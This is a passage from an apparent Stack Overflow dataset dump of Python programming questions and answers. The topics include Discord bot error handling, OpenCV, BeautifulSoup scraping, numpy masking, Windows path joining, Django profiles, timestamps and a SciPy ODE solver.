emb = disnake.Embed(title=f"Видача ролі", description=f"Користувачу {member.mention} було видано роль {role.mention} на сервері {ctx.guild.name}\n Видав модератор - **{ctx.author.mention}**", colour=disnake.Color.blue(), timestamp=ctx.created_at)
await ctx.send(embed=emb)
else:
await ctx.send("You don`t have such permissions!")
Please, help me. I tried diferrent variants and no one working
| [
"I think you are not getting what you want because you are trying to integrate both at once. From what I can see from your description and code, the easiest solution I could provide you is removing @commands.has_permissions(view_audit_log=True) from your \"what I want to have\" section of code. However, if you don't want to have to add an extra if and else statement sending \"you dont have permissions\" to the user under every command, I would suggest creating an error handler. Using this method, you would be able to use the first block of code you have listed in your question. Here is a very basic sample of the one I use which deals with a user not having permissions to use a certain command. You'll probably need to change it to fit your specific bot but it's a start:\[email protected]\nasync def on_command_error(ctx, error)\n await ctx.send(error) # this sends the error where the user is attempting to use a command. This means if the user is missing the right permissions to use a command, it will send something like \"missing permissions\" to the user. Which I think is what you are looking for\n\n\nThe \"what I want to have\" code is not working because the code you have under it is unreachable unless the user has the audit_log permissions. And if they already have those permissions, the if and else statements checking permissions are not very useful. An error handler is in my opinion good to have and has helped me a ton with my bots. Hope this helps\n"
] | [
0
] | [] | [] | [
"discord",
"discord.py",
"disnake",
"python"
] | stackoverflow_0074589128_discord_discord.py_disnake_python.txt |
Q:
Python how to read cropped Word with CV2 and convert to gray?
I'm trying to do letter segmentation, and I'm using WordDetector to crop words, as in this code:
def contours_words(image_file):
im3 = image_file.copy()
img = prepare_img(image_file, 50)
detections = detect(img,
kernel_size=25,
sigma=3,
theta=8,
min_area=100)
line = sort_line(detections)[0]
for i, word in enumerate(line):
if word.bbox.h > 19 and word.bbox.w >= 22 and word.bbox.w <= 250:
contours_letters(word.img)
I get the cropped image as an array, so I need to read it with OpenCV, convert it to grayscale, and
use it to find contours like this:
gray = cv2.cvtColor(image_file, cv2.COLOR_BGR2GRAY)
ret, thresh1 = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY_INV)
dilated = cv2.dilate(thresh1, None, iterations=1)
cnts = cv2.findContours(
dilated.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
cnts = sort_contours(cnts, method="left-to-right")[0]
when I try to read the array image with
image = cv2.imread(image_file)
I get an error, and I don't want to save the image and re-read it again, so that no images are saved on the client. Thanks all.
A:
I found the answer: I need to convert it to an RGB color image, then convert it to grayscale:
opencvImage = cv2.cvtColor(np.array(image_file), cv2.COLOR_RGB2BGR)
gray = cv2.cvtColor(opencvImage, cv2.COLOR_BGR2GRAY)
| Python how to read cropped Word with CV2 and convert to gray? | I'm trying to do letter segmentation, and I'm using WordDetector to crop words, as in this code:
def contours_words(image_file):
im3 = image_file.copy()
img = prepare_img(image_file, 50)
detections = detect(img,
kernel_size=25,
sigma=3,
theta=8,
min_area=100)
line = sort_line(detections)[0]
for i, word in enumerate(line):
if word.bbox.h > 19 and word.bbox.w >= 22 and word.bbox.w <= 250:
contours_letters(word.img)
I get the cropped image as an array, so I need to read it with OpenCV, convert it to grayscale, and
use it to find contours like this:
gray = cv2.cvtColor(image_file, cv2.COLOR_BGR2GRAY)
ret, thresh1 = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY_INV)
dilated = cv2.dilate(thresh1, None, iterations=1)
cnts = cv2.findContours(
dilated.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
cnts = sort_contours(cnts, method="left-to-right")[0]
when I try to read the array image with
image = cv2.imread(image_file)
I get an error, and I don't want to save the image and re-read it again, so that no images are saved on the client. Thanks all.
| [
"I found the answer I need to convert it to RGB color image then I convert it to gray scale\nopencvImage = cv2.cvtColor(np.array(image_file), cv2.COLOR_RGB2BGR)\ngray = cv2.cvtColor(opencvImage, cv2.COLOR_BGR2GRAY)\n\n"
] | [
0
] | [] | [] | [
"computer_vision",
"opencv",
"python"
] | stackoverflow_0074602640_computer_vision_opencv_python.txt |
Q:
How to remove lines that do not end with numbers?
I have a text file Mytext.txt that looks like this,
0 1 A
1 2 T
2 3 A
3 4 B
4 5 A
5 6
6 7 A
7 8 D
8 9 C
9 10
10 11 M
11 12 Z
12 13 H
What is the easiest way in Python to remove the lines that do not end with a letter? So the above becomes
0 1 A
1 2 T
2 3 A
3 4 B
4 5 A
6 7 A
7 8 D
8 9 C
10 11 M
11 12 Z
12 13 H
A:
with open('Mytext.txt', 'r') as fin:
with open('Newtext.txt', 'w') as fout:
for line in fin:
            if line.rstrip()[-1].isalpha():
fout.write(line)
| How to remove lines that do not end with numbers? | I have a text file Mytext.txt that looks like this,
0 1 A
1 2 T
2 3 A
3 4 B
4 5 A
5 6
6 7 A
7 8 D
8 9 C
9 10
10 11 M
11 12 Z
12 13 H
What is the easiest way in Python to remove the lines that do not end with a letter? So the above becomes
0 1 A
1 2 T
2 3 A
3 4 B
4 5 A
6 7 A
7 8 D
8 9 C
10 11 M
11 12 Z
12 13 H
| [
"with open('Mytext.txt', 'r') as fin:\n with open('Newtext.txt', 'w') as fout:\n for line in fin:\n if line.rstrip()[-1].isalpha()\n fout.write(line)\n\n"
] | [
1
] | [] | [] | [
"python",
"text"
] | stackoverflow_0074602920_python_text.txt |
Q:
Web scraping doesn't iterate over entire webpage
I'm trying to scrape all the player names and player ratings from this website:
https://www.fifaindex.com/players/?gender=0&league=1&order=desc
But I only get the information for the first player on the page.
The code I'm using:
from bs4 import BeautifulSoup
import requests
url = "https://www.fifaindex.com/players/?gender=0&league=1&order=desc"
page = requests.get(url)
soup = BeautifulSoup(page.content, 'html.parser')
results = soup.find_all('div', class_="responsive-table table-rounded")
for result in results:
rating = result.find("span", class_="badge badge-dark rating r3").text
name = result.find("a", class_="link-player")
info = [rating, name]
print(info)
The HTML parsed is attached in the picture
A:
I tinkered around a little bit and I think I got a version that does what you want
from bs4 import BeautifulSoup
import requests
page = requests.get("https://www.fifaindex.com/players/?gender=0&league=1&order=desc")
soup = BeautifulSoup(page.content, "html.parser")
results = soup.find_all("tr")
for result in results:
try:
result["data-playerid"]
except KeyError:
continue
rating = result.find("span", class_="badge badge-dark rating r3").text
name = result.find("a", class_="link-player")
info = [rating, name]
print(info)
A:
Getting all table rows with a data-playerid attribute will fix it:
#!/usr/bin/env python3
from bs4 import BeautifulSoup
import requests
url = "https://www.fifaindex.com/players/?gender=0&league=1&order=desc"
r = requests.get(url)
soup = BeautifulSoup(r.content, 'html.parser')
results = soup.find_all('tr', {'data-playerid': True})
for res in results:
rating = res.find("span", class_="badge badge-dark rating r3").text
name = res.find("a", class_="link-player")
info = [rating, name]
print(info)
| Web scraping doesn't iterate over entire webpage | I'm trying to scrape all the player names and player ratings from this website:
https://www.fifaindex.com/players/?gender=0&league=1&order=desc
But I only get the information for the first player on the page.
The code I'm using:
from bs4 import BeautifulSoup
import requests
url = "https://www.fifaindex.com/players/?gender=0&league=1&order=desc"
page = requests.get(url)
soup = BeautifulSoup(page.content, 'html.parser')
results = soup.find_all('div', class_="responsive-table table-rounded")
for result in results:
rating = result.find("span", class_="badge badge-dark rating r3").text
name = result.find("a", class_="link-player")
info = [rating, name]
print(info)
The HTML parsed is attached in the picture
| [
"I tinkered around a little bit and I think I got a version that does what you want\nfrom bs4 import BeautifulSoup\nimport requests\n\npage = requests.get(\"https://www.fifaindex.com/players/? \ngender=0&league=1&order=desc\")\nsoup = BeautifulSoup(page.content, \"html.parser\")\nresults = soup.find_all(\"tr\")\n\nfor result in results:\n try:\n result[\"data-playerid\"]\n except KeyError:\n continue\n\n rating = result.find(\"span\", class_=\"badge badge-dark rating r3\").text\n name = result.find(\"a\", class_=\"link-player\")\n info = [rating, name]\n print(info)\n\n",
"Get all table lines with a data-playerid attribute will fix it:\n#!/usr/bin/env python3\nfrom bs4 import BeautifulSoup\nimport requests\nurl = \"https://www.fifaindex.com/players/?gender=0&league=1&order=desc\"\nr = requests.get(url)\n\nsoup = BeautifulSoup(r.content, 'html.parser')\n\nresults = soup.find_all('tr', {'data-playerid': True})\n\nfor res in results:\n rating = res.find(\"span\", class_=\"badge badge-dark rating r3\").text\n name = res.find(\"a\", class_=\"link-player\")\n info = [rating, name]\n print(info)\n\n"
] | [
0,
0
] | [] | [] | [
"beautifulsoup",
"python",
"web_scraping"
] | stackoverflow_0074602709_beautifulsoup_python_web_scraping.txt |
Q:
How to improve partial 2D array filling/filtering in numpy
I'm currently reviewing code. I have a double loop to filter a 2D array according to a 1D array.
Here is the code:
import numpy as np
size_a = 500
size_b = 2000
a = np.random.rand(size_a)
c = np.random.rand(size_a*size_b).reshape((size_a, size_b))
d = np.random.rand(size_b)
# double loop for filtering c according to d
for i in range(size_b):
for j in range(size_a):
if a[j] <= d[i]:
c[j,i] = 0
# first improvement
for i in range(size_b):
c[a <= d[i], i] = 0
Can we do better, in terms of speed of execution?
A:
Let's describe what you want to do in words:
You have a matrix c of shape (size_a, size_b).
You have a vector a with one element per row of c
You have a vector d with one element per column of c
In those locations where a[i] <= d[j], you want to set c to zero.
Let's say we have:
size_a = 3
size_b = 5
a = np.array([23, 55, 37])
c = np.array([[56, 37, 50, 49, 57],
[81, 50, 98, 11, 9],
[52, 47, 23, 64, 20]])
d = np.array([27, 16, 74, 95, 8])
I obtained these using np.random.randint(0, 100, shape) for each of the arrays, but I've hardcoded them here for ease of reproduction and understanding
You can compare the vectors a and d at every combination of i and j two ways:
Cast them into matrices of the same size:
a_cast = np.tile(a, (size_b, 1)).T
# array([[23, 23, 23, 23, 23],
# [55, 55, 55, 55, 55],
# [37, 37, 37, 37, 37]])
d_cast = np.tile(d, (size_a, 1))
# array([[27, 16, 74, 95, 8],
# [27, 16, 74, 95, 8],
# [27, 16, 74, 95, 8]])
mask = a_cast <= d_cast
# array([[ True, False, True, True, False],
# [False, False, True, True, False],
# [False, False, True, True, False]])
c[mask] = 0
Have numpy do the broadcasting for you, by making a a (size_a, 1) matrix and d a (1, size_b) matrix. This is done by taking a slice of each vector, with an extra None axis, which creates an extra axis of length 1 (see In numpy, what does selection by [:,None] do?):
mask = a[:, None] <= d[None, :]
# a[:, None] gives:
# array([[23],
# [55],
# [37]])
# d[None, :] gives:
# array([[27, 16, 74, 95, 8]])
c[mask] = 0
Both these methods result in the same c:
array([[ 0, 37, 0, 0, 57],
[81, 50, 0, 0, 9],
[52, 47, 0, 0, 20]])
| How to improve partial 2D array filling/filtering in numpy | I'm currently reviewing code. I have a double loop to filter a 2D array according to a 1D array.
Here is the code:
import numpy as np
size_a = 500
size_b = 2000
a = np.random.rand(size_a)
c = np.random.rand(size_a*size_b).reshape((size_a, size_b))
d = np.random.rand(size_b)
# double loop for filtering c according to d
for i in range(size_b):
for j in range(size_a):
if a[j] <= d[i]:
c[j,i] = 0
# first improvement
for i in range(size_b):
c[a <= d[i], i] = 0
Can we do better, in terms of speed of execution?
| [
"Let's describe what you want to do in words:\n\nYou have a matrix c of shape (size_a, size_b).\nYou have a vector a with one element per row of c\nYou have a vector d with one element per column of c\n\nIn those locations where a[i] <= d[j], you want to set c to zero.\nLet's say we have:\nsize_a = 3\nsize_b = 5\n\na = np.array([23, 55, 37])\nc = np.array([[56, 37, 50, 49, 57],\n [81, 50, 98, 11, 9],\n [52, 47, 23, 64, 20]])\n\nd = np.array([27, 16, 74, 95, 8])\n\nI obtained these using np.random.randint(0, 100, shape) for each of the arrays, but I've hardcoded them here for ease of reproduction and understanding\nYou can compare the vectors a and d at every combination of i and j two ways:\n\nCast them into matrices of the same size:\n\na_cast = np.tile(a, (size_b, 1)).T\n# array([[23, 23, 23, 23, 23],\n# [55, 55, 55, 55, 55],\n# [37, 37, 37, 37, 37]])\n\nd_cast = np.tile(d, (size_a, 1))\n# array([[27, 16, 74, 95, 8],\n# [27, 16, 74, 95, 8],\n# [27, 16, 74, 95, 8]])\n\nmask = a_cast <= d_cast\n# array([[ True, False, True, True, False],\n# [False, False, True, True, False],\n# [False, False, True, True, False]])\n\nc[mask] = 0\n\n\nHave numpy do the broadcasting for you, by making a a (size_a, 1) matrix and d a (1, size_b) matrix. This is done by taking a slice of each vector, with an extra None axis, which creates an extra axis of length 1 (see In numpy, what does selection by [:,None] do?):\n\nmask = a[:, None] <= d[None, :]\n\n# a[:, None] gives:\n# array([[23],\n# [55],\n# [37]])\n\n# d[None, :] gives:\n# array([[27, 16, 74, 95, 8]])\n\n\nc[mask] = 0\n\nBoth these methods result in the same c:\narray([[ 0, 37, 0, 0, 57],\n [81, 50, 0, 0, 9],\n [52, 47, 0, 0, 20]])\n\n"
] | [
1
] | [] | [] | [
"numpy",
"python"
] | stackoverflow_0074602767_numpy_python.txt |
Q:
Concatenate path and filename
I have to build the full path in Python. I tried this:
filename= "myfile.odt"
subprocess.call(['C:\Program Files (x86)\LibreOffice 5\program\soffice.exe',
'--headless',
'--convert-to',
'pdf', '--outdir',
r'C:\Users\A\Desktop\Repo\',
r'C:\Users\A\Desktop\Repo\'+filename])
But I get this error
SyntaxError: EOL while scanning string literal.
A:
Try:
import os
os.path.join('C:\Users\A\Desktop\Repo', filename)
The os module contains many useful methods for directory and path manipulation
A:
Backslash character (\) has to be escaped in string literals.
This is wrong: '\'
This is correct: '\\' - this is a string containing one backslash
Therefore, this is wrong:
'C:\Program Files (x86)\LibreOffice 5\program\soffice.exe'
There is a trick!
String literals prefixed by r are meant for easier writing of regular expressions. One of their features is that backslash characters do not have to be escaped. So, this would be OK:
r'C:\Program Files (x86)\LibreOffice 5\program\soffice.exe'
However, that won't work for a string ending in a backslash:
r'\' - this is a syntax error
So, this is also wrong:
r'C:\Users\A\Desktop\Repo\'
So, I would do the following:
import os
import subprocess
soffice = 'C:\\Program Files (x86)\\LibreOffice 5\\program\\soffice.exe'
outdir = 'C:\\Users\\A\\Desktop\\Repo\\'
full_path = os.path.join(outdir, filename)
subprocess.call([soffice,
'--headless',
'--convert-to', 'pdf',
'--outdir', outdir,
full_path])
A:
The problem you have is that your raw string ends with a single backslash. For a reason I don't understand, this is not allowed. You can either double up the slash at the end:
r'C:\Users\A\Desktop\Repo\\'+filename
or use os.path.join(), which is the preferred method:
os.path.join(r'C:\Users\A\Desktop\Repo', filename)
A:
To build on what zanseb said, use os.path.join; also, \ is an escape character, so your string literal can't end with a \ as it would escape the ending quote.
import os
os.path.join(r'C:\Users\A\Desktop\Repo', filename)
A:
To anyone else stumbling across this question, you can use \ to concatenate a Path object and str.
Use path.Path for paths compatible with both Unix and Windows (you can use it the same way as I've used pathlib.PureWindowsPath).
The only reason I'm using pathlib.PureWindowsPath is that the question asked specifically about Windows paths.
For example:
import pathlib
# PureWindowsPath enforces Windows path style
# for paths that work on both Unix and Windows use path.Path
base_dir = pathlib.PureWindowsPath(r'C:\Program Files (x86)\LibreOffice 5\program')
# elegant path concatenation
myfile = base_dir / "myfile.odt"
print(myfile)
>>> C:\Program Files (x86)\LibreOffice 5\program\myfile.odt
A:
Add the library to your code:
from pathlib import Path

When you want to get the current path without the filename, use this method:
print("Directory Path:", Path().absolute())

Now you just need to add the file name to it, for example:
mylink = str(Path().absolute())+"/"+"filename.etc" #str(Path().absolute())+"/"+"hello.txt"

You would normally add the "r" prefix to the path, for example r"c://...", but you do not need to do that here.
A:
You can also simply add the strings together. Personally I like this more.
filename = r"{}{}{}".format(dir, foldername, filename)
| Concatenate path and filename | I have to build the full path in Python. I tried this:
filename= "myfile.odt"
subprocess.call(['C:\Program Files (x86)\LibreOffice 5\program\soffice.exe',
'--headless',
'--convert-to',
'pdf', '--outdir',
r'C:\Users\A\Desktop\Repo\',
r'C:\Users\A\Desktop\Repo\'+filename])
But I get this error
SyntaxError: EOL while scanning string literal.
| [
"Try:\nimport os\nos.path.join('C:\\Users\\A\\Desktop\\Repo', filename)\n\nThe os module contains many useful methods for directory and path manipulation\n",
"Backslash character (\\) has to be escaped in string literals.\n\nThis is wrong: '\\'\nThis is correct: '\\\\' - this is a string containing one backslash\n\nTherefore, this is wrong:\n'C:\\Program Files (x86)\\LibreOffice 5\\program\\soffice.exe'\n\nThere is a trick!\nString literals prefixed by r are meant for easier writing of regular expressions. One of their features is that backslash characters do not have to be escaped. So, this would be OK:\nr'C:\\Program Files (x86)\\LibreOffice 5\\program\\soffice.exe'\n\nHowever, that wont work for a string ending in backslash:\n\nr'\\' - this is a syntax error\n\nSo, this is also wrong:\nr'C:\\Users\\A\\Desktop\\Repo\\'\n\nSo, I would do the following:\nimport os\nimport subprocess\n\n\nsoffice = 'C:\\\\Program Files (x86)\\\\LibreOffice 5\\\\program\\\\soffice.exe'\noutdir = 'C:\\\\Users\\\\A\\\\Desktop\\\\Repo\\\\'\nfull_path = os.path.join(outdir, filename)\n\nsubprocess.call([soffice,\n '--headless',\n '--convert-to', 'pdf',\n '--outdir', outdir,\n full_path])\n\n",
"The problem you have is that your raw string is ending with a single backslash. For reason I don't understand, this is not allowed. You can either double up the slash at the end:\nr'C:\\Users\\A\\Desktop\\Repo\\\\'+filename\n\nor use os.path.join(), which is the preferred method:\nos.path.join(r'C:\\Users\\A\\Desktop\\Repo', filename)\n\n",
"To build on what zanseb said, use the os.path.join, but also \\ is an escape character, so your string literal can't end with a \\ as it would escape the ending quote.\nimport os\nos.path.join(r'C:\\Users\\A\\Desktop\\Repo', filename)\n\n",
"To anyone else stumbling across this question, you can use \\ to concatenate a Path object and str.\nUse path.Path for paths compatible with both Unix and Windows (you can use it the same way as I've used pathlib.PureWindowsPath).\nThe only reason I'm using pathlib.PureWindowsPath is that the question asked specifically about Windows paths.\nFor example:\nimport pathlib\n# PureWindowsPath enforces Windows path style\n# for paths that work on both Unix and Windows use path.Path\nbase_dir = pathlib.PureWindowsPath(r'C:\\Program Files (x86)\\LibreOffice 5\\program')\n# elegant path concatenation\nmyfile = base_dir / \"myfile.odt\"\n\nprint(myfile)\n>>> C:\\Program Files (x86)\\LibreOffice 5\\program\\myfile.odt\n\n",
"add library to code :\nfrom pathlib import Path\n\nwhen u want get current path without filename use this method :\nprint(\"Directory Path:\", Path().absolute())\n\nnow you just need to add the file name to it :for example\n mylink = str(Path().absolute())+\"/\"+\"filename.etc\" #str(Path().absolute())+\"/\"+\"hello.txt\"\n\nIf normally addes to the first path \"r\" character\nfor example: r\"c://...\"\nYou do not need to do here\n",
"You can also simply add the strings together. Personally I like this more.\nfilename = r\"{}{}{}\".format(dir, foldername, filename)\n\n"
] | [
25,
7,
2,
2,
1,
0,
0
] | [] | [] | [
"filepath",
"path",
"python"
] | stackoverflow_0040596748_filepath_path_python.txt |
Q:
modifying dataframe through specific dates
I have a timeseries where I need to apply an equation on the same day and month across the years.
Name | date | value | Type
player 1 | 2010/02/10 | 100 | 2
player 2 | 2011/16/15 | 200 | 3
player 3 | 2012/02/10 | 150 | 4
player 4 | 2013/11/16 | 136 | 5
player 5 | 2014/02/10 | 94 | 6
I need to change my column 'Type' for the dates where the month and day equal 'YYYY/02/10', ignoring the year, and if that date is a weekend, use the next business day.
My final data should be like
Name | date | value | Type
player 1 | 2010/02/10 | 100 | 2
player 2 | 2011/16/15 | 200 | 3
player 3 | 2012/02/10 | 150 | 2
player 4 | 2013/11/16 | 136 | 5
player 5 | 2014/02/10 | 94 | 2
My timeseries is huge, so I cannot use a loop like for i in list, where my list holds all the years, and then pass an f-string like f'{i}/02/10', because I need a little more performance.
Any idea how i can do that?
A:
If you have strings:
df.loc[df['date'].str.endswith('02/10'), 'Type'] = 2
For datetime type:
df.loc[df['date'].dt.strftime('%m/%d').eq('02/10'), 'Type'] = 2
Output:
Name date value Type
0 player 1 2010/02/10 100 2
1 player 2 2011/16/15 200 3
2 player 3 2012/02/10 150 2
3 player 4 2013/11/16 136 5
4 player 5 2014/02/10 94 2
| modifying dataframe through specific dates | I have a timeseries where I need to apply an equation on the same day and month across the years.
Name | date | value | Type
player 1 | 2010/02/10 | 100 | 2
player 2 | 2011/16/15 | 200 | 3
player 3 | 2012/02/10 | 150 | 4
player 4 | 2013/11/16 | 136 | 5
player 5 | 2014/02/10 | 94 | 6
I need to change my column 'Type' for the dates where the month and day equal 'YYYY/02/10', ignoring the year, and if that date is a weekend, use the next business day.
My final data should be like
Name | date | value | Type
player 1 | 2010/02/10 | 100 | 2
player 2 | 2011/16/15 | 200 | 3
player 3 | 2012/02/10 | 150 | 2
player 4 | 2013/11/16 | 136 | 5
player 5 | 2014/02/10 | 94 | 2
My timeseries is huge, so I cannot use a loop like for i in list, where my list holds all the years, and then pass an f-string like f'{i}/02/10', because I need a little more performance.
Any idea how i can do that?
| [
"If you have strings:\ndf.loc[df['date'].str.endswith('02/10'), 'Type'] = 2\n\nFor datetime type:\ndf.loc[df['date'].dt.strftime('%d/%m').eq('02/10'), 'Type'] = 2\n\nOutput:\n Name date value Type\n0 player 1 2010/02/10 100 2\n1 player 2 2011/16/15 200 3\n2 player 3 2012/02/10 150 2\n3 player 4 2013/11/16 136 5\n4 player 5 2014/02/10 94 2\n\n"
] | [
0
] | [] | [] | [
"numpy",
"python",
"python_3.x"
] | stackoverflow_0074602892_numpy_python_python_3.x.txt |
Q:
Django how to split users and customers
In my project (small online shop) I need to split registration for users and customers.
From the information I found, when somebody registers in Django their account is stored in one table; in this table I can see the admin user, staff, and other registered accounts, and I can see them all in the admin on the Users page. But I do not want to put all accounts in one "basket". I need to split them into different tables.
For example, the superuser can create a new user (content manager) in the admin area and grant them access/permission to manage the admin area (create products etc.); these users and the superuser will be on the default Users page. The Customers page will display only users who registered, for example, via the https://mysite/account/register page; after registration I can see this customer account on the Customers page in the admin area, but not on the Users page. And this customer can log in to their account, for example, via https://mysite/account/login
Is this possible?
A:
As Jay said, everyone registered in the database is still a User whatever their role may be (admin, superuser, customer). What you could do is create a Profile model where everyone will have their information such as telephone, location etc, and you will also add another field clarifying their property.
PACKAGES = [
('customer', 'Customer'),
('support', 'Support'),
('admin', 'Admin'),
]
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, primary_key=True)
image = models.ImageField(default='user_avatar.png', upload_to='...')
last_visit = models.DateField(default=timezone.now, blank=True)
location = models.CharField(max_length=254, null=True, blank=True)
contact_phone = models.CharField(max_length=15)
user_role = models.CharField(default="customer", choices=PACKAGES, max_length=20)
Then all you need to do is edit your admin.py to implement a search parameter there:
class ProfileAdmin(admin.ModelAdmin):
list_filter=('user_role',)
admin.site.register(Profile, ProfileAdmin)
Doing that will give you a filter_list in the right corner of your admin page but that is for admin page only.
If you want to access different roles in your views or your templates you will do so by getting the user_role you need:
customers = Profile.objects.filter(user_role='customer')
| Django how to split users and customers | In my project (small online shop) I need to split registration for users and customers.
From the information I found, when somebody registers in Django their account is stored in one table; in this table I can see the admin user, staff, and other registered accounts, and I can see them all in the admin on the Users page. But I do not want to put all accounts in one "basket". I need to split them into different tables.
For example, the superuser can create a new user (content manager) in the admin area and grant them access/permission to manage the admin area (create products etc.); these users and the superuser will be on the default Users page. The Customers page will display only users who registered, for example, via the https://mysite/account/register page; after registration I can see this customer account on the Customers page in the admin area, but not on the Users page. And this customer can log in to their account, for example, via https://mysite/account/login
Is this possible?
| [
"As Jay said, everyone registered in the database is still a User whatever their role may be (admin, superuser, customer). What you could do is create a Profile model where everyone will have their information such as telephone, location etc, and you will also add another field clarifying their property.\nPACKAGES = [\n ('customer', 'Customer'),\n ('support', 'Support'),\n ('admin', 'Admin'),\n]\n\nclass Profile(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE, primary_key=True)\n image = models.ImageField(default='user_avatar.png', upload_to='...')\n last_visit = models.DateField(default=timezone.now, blank=True)\n location = models.CharField(max_length=254, null=True, blank=True)\n contact_phone = models.CharField(max_length=15)\n user_role = models.CharField(default=\"customer\", choices=PACKAGES, max_length=20)\n \n\nThen all you need to do is edit your admin.py to implement a search parameter there:\nclass ProfileAdmin(admin.ModelAdmin):\n list_filter=('user_role',)\n\nadmin.site.register(Profile, ProfileAdmin)\n\nDoing that will give you a filter_list in the right corner of your admin page but that is for admin page only.\nIf you want to access different roles in your views or your templates you will do so by getting the user_role you need:\ncustomers = Profile.objects.filter(user_role='customer')\n\n"
] | [
2
] | [] | [] | [
"django",
"python",
"python_3.x"
] | stackoverflow_0074602189_django_python_python_3.x.txt |
Q:
Python: How to convert a Timestamp of precision 9 to a datetime object?
I am fetching crypto data from the ByBit exchange which is returning the timestamp field created_at_e9 in the following format: 1663315207126761200
The standard is 11-13 digits, but here there are 19 digits. How do I fetch the datetime from it?
A:
You can look at this SO question to see how to convert a timestamp into a datetime in Python. And since the timestamp precision is 1e9, you can simply multiply the value by 1e-9 or divide it by 1e9 to get the timestamp in seconds.
from datetime import datetime
datetime.fromtimestamp(created_at_e9 * 1e-9)
| Python: How to convert a Timestamp of precision 9 to a datetime object? | I am fetching crypto data from the ByBit exchange which is returning the timestamp field created_at_e9 in the following format: 1663315207126761200
The standard is 11-13 digits, but here there are 19 digits. How do I fetch the datetime from it?
| [
"You can look at this so see how to convert a timestamp into a datetime in python. And since the timestamp presision is 1e9 you can simply multiply the value by 1e-9 or divide it by 1e9 to get the timestamp in seconds.\nfrom datetime import datetime\ndatetime.fromtimestamp(created_at_e9 * 1e-9)\n\n"
] | [
1
] | [] | [] | [
"datetime",
"python",
"unix_timestamp"
] | stackoverflow_0074602919_datetime_python_unix_timestamp.txt |
Q:
Transforming a matrix by placing its elements in the reverse order of the initial in python
I'm looking to solve the problem mentioned in the title without any specific functions that may or may not exist for this; something along the lines of using mostly loops.
I thought about reversing each individual row using list.reverse() and then moving the rows around, but I'm not sure how to implement it.
A:
Try this approach; it will not change the original Matrix:
Matrix = [[1,2,3],[4,5,6],[7,8,9]]
newMatrix = []
for line in range(len(Matrix)):
    newMatrix.append(list(reversed(Matrix[line])))
newMatrix.reverse()
print(newMatrix)
print(Matrix)
output:
[[9, 8, 7], [6, 5, 4], [3, 2, 1]]
[[1, 2, 3], [4, 5, 6], [7, 8, 9]]
| Transforming a matrix by placing its elements in the reverse order of the initial in python | I'm looking to solve the problem mentioned in the title without any specific functions that may or may not exist for this; something along the lines of using mostly loops.
I thought about reversing each individual row using list.reverse() and then moving the rows around, but I'm not sure how to implement it.
| [
"try this new realization and this will not change the original Matrix\nMatrix = [[1,2,3],[4,5,6],[7,8,9]]\nnewMatrix = []\nfor line in range(len(Matrix)):\n newMatrix.append(sorted(Matrix[line],reverse=True))\n\nnewMatrix.reverse()\nprint(newMatrix)\nprint(Matrix)\n\noutput:\n[[9, 8, 7], [6, 5, 4], [3, 2, 1]]\n[[1, 2, 3], [4, 5, 6], [7, 8, 9]]\n\n"
] | [
-1
] | [
"Try This\nMatrix = [[1,2,3],[4,5,6],[7,8,9]]\nnewMatrix = []\nfor line in range(len(Matrix)):\n Matrix[line].reverse()\n newMatrix.append(Matrix[line])\n\nnewMatrix.reverse()\nprint(newMatrix)\n\noutput\n[[9, 8, 7], [6, 5, 4], [3, 2, 1]]\n\n"
] | [
-1
] | [
"matrix",
"python"
] | stackoverflow_0074602732_matrix_python.txt |
Q:
solve_ivp discards imaginary part of complex solution
I am computing a solution to the free basis expansion of the Dirac equation for electron-positron pair production. For this I need to solve a system of equations that looks like this:
Equation for pair production, from Mocken et al.
EDIT: This has been solved by passing y0 as a complex type into the solver, as stated in this issue: https://github.com/scipy/scipy/issues/8453. I would definitely consider this a bug, but it seems to have gone under the radar for at least 4 years.
For this I am using SciPy's solve_ivp integrator in the following way:
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from scipy.integrate import solve_ivp
import scipy.constants as constants
#Impulse
px, py = 0 , 0
#physics constants
e = constants.e
m = constants.m_e # electronmass
c = constants.c
hbar = constants.hbar
#relativistic energy
E = np.sqrt(m**2 *c**4 + (px**2+py**2) * c**2) # E_p
#adiabatic parameter
xi = 1
#Parameter of the system
w = 0.840 #frequency in 1/m_e
N = 8 # amount of amplitudes in window
T = 2* np.pi/w
#unit system
c = 1
hbar = 1
m = 1
#strength of electric field
E_0 = xi*m*c*w/e
print(E_0)
#vectorpotential
A = lambda t,F: -E_0/w *np.sin(t)*F
def linearFenster2(t):
conditions = [t <=0, (t/w>=0) and (t/w <= T/2), (t/w >= T/2) and (t/w<=T*(N+1/2)), (t/w>=T*(N+1/2)) and (t/w<=T*(N+1)), t/w>=T*(N+1)]
funcs = [lambda t: 0, lambda t: 1/np.pi *t, lambda t: 1, lambda t: 1-w/np.pi * (t/w-T*(N+1/2)), lambda t: 0]
return np.piecewise(t,conditions,funcs)
#Coefficient functions
nu = lambda t: -1j/hbar *e*A(w*t,linearFenster2(w*t)) *np.exp(2*1j/hbar * E*t) *(px*py*c**2 /(E*(E+m*c**2)) + 1j*(1- c**2 *py**2/(E*(E+m*c**2))))
kappa = lambda t: 1j*e*A(t,linearFenster2(w*t))* c*py/(E * hbar)
#System to solve
def System(t, y, nu, kappa):
df = kappa(t) *y[0] + nu(t) * y[1]
dg = -np.conjugate(nu(t)) * y[0] + np.conjugate(kappa(t))*y[1]
return np.array([df,dg], dtype=np.cdouble)
def solver(tmin, tmax,teval=None,f0=0,g0=1):
'''solves the system.
@tmin: starttime
@tmax: endtime
@f0: starting percentage of already present electrons of positive energy usually 0
@g0: starting percentage of already present electrons of negative energy, usually 1, therefore full vaccuum
'''
y0=[f0,g0]
tspan = np.array([tmin, tmax])
koeff = np.array([nu,kappa])
sol = solve_ivp(System,tspan,y0,t_eval= teval,args=koeff)
return sol
#Plotting of windowfunction
amount = 10**2
t = np.arange(0, T*(N+1), 1/amount)
vlinearFenster2 = np.array([linearFenster2(w*a) for a in t ], dtype = float)
fig3, ax3 = plt.subplots(1,1,figsize=[24,8])
ax3.plot(t,E_0/w * vlinearFenster2)
ax3.plot(t,A(w*t,vlinearFenster2))
